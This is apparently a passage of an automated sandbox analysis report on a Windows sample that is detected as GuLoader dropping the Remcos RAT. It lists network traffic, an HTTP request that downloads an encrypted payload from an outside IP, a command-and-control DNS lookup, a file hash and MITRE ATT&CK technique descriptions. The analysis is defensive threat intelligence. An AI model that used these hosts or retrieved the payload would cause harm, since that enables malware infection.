Aug 2, 2021 21:20:12.032175064 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.032187939 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.032213926 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.032252073 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.032286882 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.032289028 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.032325029 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.032330036 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.032361984 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.032397985 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.032399893 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.032444954 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.032464027 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.032486916 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.032524109 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.032557011 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.032562971 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.032624006 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.032658100 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.081442118 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.081500053 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.081535101 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.081583023 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.081641912 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.081681013 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.081718922 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.081748009 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.081794024 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.081836939 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.081873894 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.081877947 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.081912994 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.081940889 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.081974983 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.081983089 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.082003117 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.082041025 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.082042933 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.082077026 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.082120895 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.082134008 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.082158089 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.082212925 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.082220078 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.082268000 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.082281113 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.082305908 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.082351923 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.082366943 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.082396030 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.082431078 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.082448959 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.082468033 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.082504034 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.082519054 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.082537889 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.082575083 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.082577944 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.082609892 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.082634926 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.082655907 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.082696915 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.082730055 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.082731962 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.082849026 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.131598949 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.131665945 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.131710052 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.131747961 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.131787062 CEST	80	49766	101.99.94.119	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 2, 2021 21:17:01.393048048 CEST	49714	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:01.420507908 CEST	53	49714	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:02.722836018 CEST	58028	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:02.750277042 CEST	53	58028	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:04.696264982 CEST	53097	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:04.720990896 CEST	53	53097	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:05.761957884 CEST	49257	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:05.789669991 CEST	53	49257	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:06.840415955 CEST	62389	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:06.866498947 CEST	53	62389	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:08.514224052 CEST	49910	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:08.546753883 CEST	53	49910	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:09.595941067 CEST	55854	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:09.623547077 CEST	53	55854	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:10.547267914 CEST	64549	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:10.574770927 CEST	53	64549	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:11.647775888 CEST	63153	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:11.675528049 CEST	53	63153	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:12.845449924 CEST	52991	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:12.878277063 CEST	53	52991	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:13.870208979 CEST	53700	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:13.904135942 CEST	53	53700	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:14.987005949 CEST	51726	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:15.019890070 CEST	53	51726	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:16.020144939 CEST	56794	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:16.047681093 CEST	53	56794	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:17.078398943 CEST	56534	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:17.111186981 CEST	53	56534	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:18.109400988 CEST	56627	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:18.141968012 CEST	53	56627	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:19.095261097 CEST	56621	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:19.120047092 CEST	53	56621	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:20.116214991 CEST	63116	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:20.151633024 CEST	53	63116	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:21.170927048 CEST	64078	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:21.206410885 CEST	53	64078	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:31.180922031 CEST	64801	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:31.222162962 CEST	53	64801	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:45.923132896 CEST	61721	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:45.982989073 CEST	53	61721	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:46.522591114 CEST	51255	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:46.555643082 CEST	53	51255	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:47.145872116 CEST	61522	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:47.181860924 CEST	53	61522	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:47.704446077 CEST	52337	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:47.746491909 CEST	53	52337	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:48.197175026 CEST	55046	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:48.231225967 CEST	53	55046	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:48.602571011 CEST	49612	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:48.630182981 CEST	53	49612	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:48.787736893 CEST	49285	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:48.829253912 CEST	53	49285	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:49.046789885 CEST	50601	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:49.079457045 CEST	53	50601	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:49.693171978 CEST	60875	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:49.725912094 CEST	53	60875	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:50.854691029 CEST	56448	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:50.887387037 CEST	53	56448	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:51.457587004 CEST	59172	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:51.492850065 CEST	53	59172	8.8.8.8	192.168.2.4
Aug 2, 2021 21:18:06.299632072 CEST	62420	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:18:06.332312107 CEST	53	62420	8.8.8.8	192.168.2.4
Aug 2, 2021 21:18:06.416522026 CEST	60579	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:18:06.462497950 CEST	53	60579	8.8.8.8	192.168.2.4
Aug 2, 2021 21:18:12.731527090 CEST	50183	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:18:12.772198915 CEST	53	50183	8.8.8.8	192.168.2.4
Aug 2, 2021 21:18:41.353856087 CEST	61531	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:18:41.389388084 CEST	53	61531	8.8.8.8	192.168.2.4
Aug 2, 2021 21:18:43.933024883 CEST	49228	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:18:43.965635061 CEST	53	49228	8.8.8.8	192.168.2.4
Aug 2, 2021 21:20:14.137607098 CEST	59794	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:20:14.180700064 CEST	53	59794	8.8.8.8	192.168.2.4
Aug 2, 2021 21:21:56.173140049 CEST	55916	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:21:56.208565950 CEST	53	55916	8.8.8.8	192.168.2.4
Aug 2, 2021 21:21:56.346127033 CEST	52752	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:21:56.371498108 CEST	53	52752	8.8.8.8	192.168.2.4
Aug 2, 2021 21:21:56.724428892 CEST	60542	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:21:56.757277012 CEST	53	60542	8.8.8.8	192.168.2.4
Aug 2, 2021 21:21:59.849406958 CEST	60689	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:21:59.884716034 CEST	53	60689	8.8.8.8	192.168.2.4
Aug 2, 2021 21:22:02.763622046 CEST	64206	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:22:02.810947895 CEST	53	64206	8.8.8.8	192.168.2.4
Aug 2, 2021 21:22:03.106690884 CEST	50904	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:22:03.159214020 CEST	53	50904	8.8.8.8	192.168.2.4
Aug 2, 2021 21:24:13.843344927 CEST	57525	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:24:13.894480944 CEST	53	57525	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 2, 2021 21:20:14.137607098 CEST	192.168.2.4	8.8.8.8	0xacf	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 2, 2021 21:20:14.180700064 CEST	8.8.8.8	192.168.2.4	0xacf	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 2, 2021 21:21:56.208565950 CEST	8.8.8.8	192.168.2.4	0xdf4d	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net		CNAME (Canonical name)	IN (0x0001)

HTTP Request Dependency Graph

101.99.94.119

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49766	101.99.94.119	80	C:\Users\user\Desktop\LzbZ4T1iV8.exe

Timestamp	kBytes transferred	Direction	Data
Aug 2, 2021 21:20:11.882945061 CEST	6581	OUT	GET /WEALTH_PRUuqVZw139.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: 101.99.94.119 Cache-Control: no-cache
Aug 2, 2021 21:20:11.932694912 CEST	6582	IN	HTTP/1.1 200 OK Date: Mon, 02 Aug 2021 11:20:11 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29 Last-Modified: Sun, 01 Aug 2021 22:14:12 GMT ETag: "72840-5c886c5bd2c84" Accept-Ranges: bytes Content-Length: 469056 Content-Type: application/octet-stream Data Raw: 02 da 3f 3b 14 7d 1a 6a 97 49 3f 94 5c 82 37 c8 0c ca ec 44 1c 6d c0 32 59 f9 cf d2 b0 1a e7 13 99 e0 d4 67 ec d8 64 6e 95 58 ec b1 4f 94 7f 92 37 39 35 25 0e 6c f3 89 78 b7 14 89 1a b4 26 f2 11 bc 3c b1 1c 0b fb d6 41 4d 17 b6 90 e4 e1 56 be d4 42 8e 30 56 42 72 02 40 cf 5a 21 29 62 b6 a4 bb 97 62 c7 e2 1d 15 12 0a 25 a3 bb 05 00 9a 03 47 1d ba da 59 7d 50 7d 8e 32 9f bd 1b 63 b0 ea 7e de 40 f0 aa 58 0e 19 69 40 f1 d1 6b f1 62 d6 9c 56 99 d3 55 3a 4c c8 f3 2a 1b 7f 98 48 43 5b 6b 10 cc 6e ca 2c 4f d1 bc 05 59 7c a8 bd 1b e3 26 7b 5f 90 54 72 2d 60 23 c9 eb 7e 5d ec e2 0a 13 8d ba 86 2d 25 4e 20 56 e0 c4 56 b4 da 8c f9 40 35 ce ca 47 61 c1 d5 42 39 36 83 4b 05 13 8e 82 3a 7f 1a 70 78 d3 98 05 7d 70 85 8a 7a b4 55 f9 32 c4 64 02 aa 76 81 23 0d 67 b4 0c 86 01 3c 66 fe 8e 3d 81 d4 a9 fd 53 2d 87 b2 0a 8c 47 cb 99 07 35 0a ea 05 95 85 9a ea 9e 1c b4 42 7b 37 c3 bf 5b d5 08 31 4c 06 8c ae 2a dc 74 43 76 6b 1a 79 74 62 a4 ec 7a e4 b3 33 61 bb 8c f9 8d 24 71 d9 a7 31 0b f7 dd 8d a2 30 60 0f 5d 6b ca 63 ff f3 ad e7 ae 9c 70 5d ab fb cf ab d5 2a 9c 0b c8 8a 06 7a 9e 24 c7 88 e1 fc 5f 55 5d a2 fe e4 58 1e af 6c 38 09 9d 79 ed 0d 1e d1 9b 13 ef bb dd e2 65 05 71 fa 7e 26 bb f5 c9 72 29 42 3c 09 d8 c6 58 89 d2 04 93 17 fc f9 4a ff 0c 29 bd d9 81 ba cb e4 1b 2c 52 78 a4 d9 42 8a 61 95 7c 3e 9a 70 61 f5 c7 73 cf af 4a 80 27 ac 59 a8 a5 a9 49 8b 4d 5f 3c 72 be c5 73 21 12 da 76 7f ba 44 c5 a7 66 6a 8f 02 0d 2c 51 87 6a c1 50 3a 55 43 c6 41 a6 d1 bb 6d db 6f 22 5f 49 7b bc 5d 82 66 82 4b a4 3c d9 82 27 47 0b f0 a6 2a 48 ec 52 1e 40 e4 cc 10 e5 b4 02 68 d3 1c 3b 3c 99 33 d9 13 b9 61 55 a3 8e da ce 48 88 c3 28 d8 13 34 45 1f df b3 20 66 a5 15 3a 2d 26 dc 96 c9 67 30 5c ca 63 b9 34 86 eb 7a fc ff c3 26 06 89 06 ca a1 12 4b 9d f9 57 a7 54 49 70 0a 52 77 83 b6 e9 02 f2 6c 48 f9 74 79 d9 82 16 96 89 9a 7a de b4 90 0f f6 16 6b 07 64 5c 83 16 8f 9d 35 d2 84 8c 59 91 d3 47 b1 2a 4d ad cd 41 07 a6 d3 a3 71 13 43 48 13 55 d1 61 c8 b4 e9 72 ef e4 25 55 23 a3 6c b7 1b 62 c3 ff ed f0 85 26 dc 67 ec 9d b6 82 25 ee ff a9 0b a1 9b 2b e2 53 8e cb 80 d9 08 0e 43 7f ab aa ac e8 48 0c 86 43 08 9d 39 48 04 fc 5a fd cb ff 7f d7 7e 5f cc dd e7 46 9c 10 4c 3d 16 86 e7 3c 91 40 12 5f 01 8e 41 14 23 b5 7b 43 89 4d 4f ad 4f fe 82 56 43 16 6f 60 ec 0e cc 2b 5a f9 2b db 17 89 0a 97 3c 4b 96 7c a4 e1 58 26 05 bd dd b6 55 ab 82 d1 2f 30 a1 29 7c 1d ca aa 24 22 59 fb a1 c2 6e 18 e5 67 5a 05 bf 70 24 a9 54 96 11 ce 4f 01 7c ab 96 38 b4 35 55 08 59 ea ed 23 06 cb 67 22 ff ab ea ab ed 73 ef 40 4f 10 61 66 d5 f0 91 4b 0c 68 4b 13 1b 27 3c 7c 9e cf 12 c2 37 76 5d 5f bc c1 76 8d 4a 87 b9 10 33 69 85 2b e7 99 38 4a d2 a4 a6 09 55 d3 c9 70 5e d8 c0 6d ff 3c fb 56 07 b6 e7 fb 66 8f fb f9 d7 f4 a8 fb 01 0b fa 5c db d2 33 8e 37 1f 9e 99 c1 15 13 ea e1 cd e4 0c 5c e6 ac b1 1f 0b fb d6 45 4d 17 b6 6f 1b e1 56 06 d4 42 8e 30 56 42 72 42 40 cf 5a 21 29 62 b6 a4 bb 97 62 c7 e2 1d 15 12 0a 25 a3 bb 05 00 9a 03 47 1d ba da 59 7d 50 7d 8e 32 9f ad 1a 63 b0 e4 61 64 4e f0 1e 51 c3 38 d1 41 bd 1c 4a a5 0a bf ef 76 e9 a1 3a 5d 3e a9 9e 0a 78 1e f6 26 2c 2f 4b 72 a9 4e b8 59 21 f1 d5 6b 79 38 Data Ascii: ?;}jI?\7Dm2YgdnXO795%lx&<AMVB0VBr@Z!)bb%GY}P}2c~@Xi@kbVU:LHC[kn,OY\|&{_Tr-`#~]-%N VV@5GaB96K:px}pzU2dv#g<f=S-G5B{7[1LtCvkytbz3a$q10`]kcp]z$_U]Xl8yeq~&r)B<XJ),RxBa\|>pasJ'YIM_<rs!vDfj,QjP:UCAmo"_I{]fK<'GHR@h;<3aUH(4E f:-&g0\c4z&KWTIpRwlHtyzkd\5YG*MAqCHUar%U#lb&g%+SCHC9HZ~_FL=<@_A#{CMOOVCo`+Z+<K\|X&U/0)\|$"YngZp$TO\|85UY#g"s@OafKhK'<\|7v]_vJ3i+8JUp^m<Vf\37\EMoVB0VBrB@Z!)bb%GY}P}2cadNQ8AJv:]>x&,/KrNY!ky8

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: LzbZ4T1iV8.exe PID: 7032 Parent PID: 5836

General

Start time:	21:17:06
Start date:	02/08/2021
Path:	C:\Users\user\Desktop\LzbZ4T1iV8.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\LzbZ4T1iV8.exe'
Imagebase:	0x400000
File size:	114688 bytes
MD5 hash:	41E1BC9DE5F3B61639FB88143E933FF8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: LzbZ4T1iV8.exe PID: 1504 Parent PID: 7032

General

Start time:	21:18:52
Start date:	02/08/2021
Path:	C:\Users\user\Desktop\LzbZ4T1iV8.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\LzbZ4T1iV8.exe'
Imagebase:	0x400000
File size:	114688 bytes
MD5 hash:	41E1BC9DE5F3B61639FB88143E933FF8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.1716863368.00000000006E7000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	low

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report LzbZ4T1iV8.exe

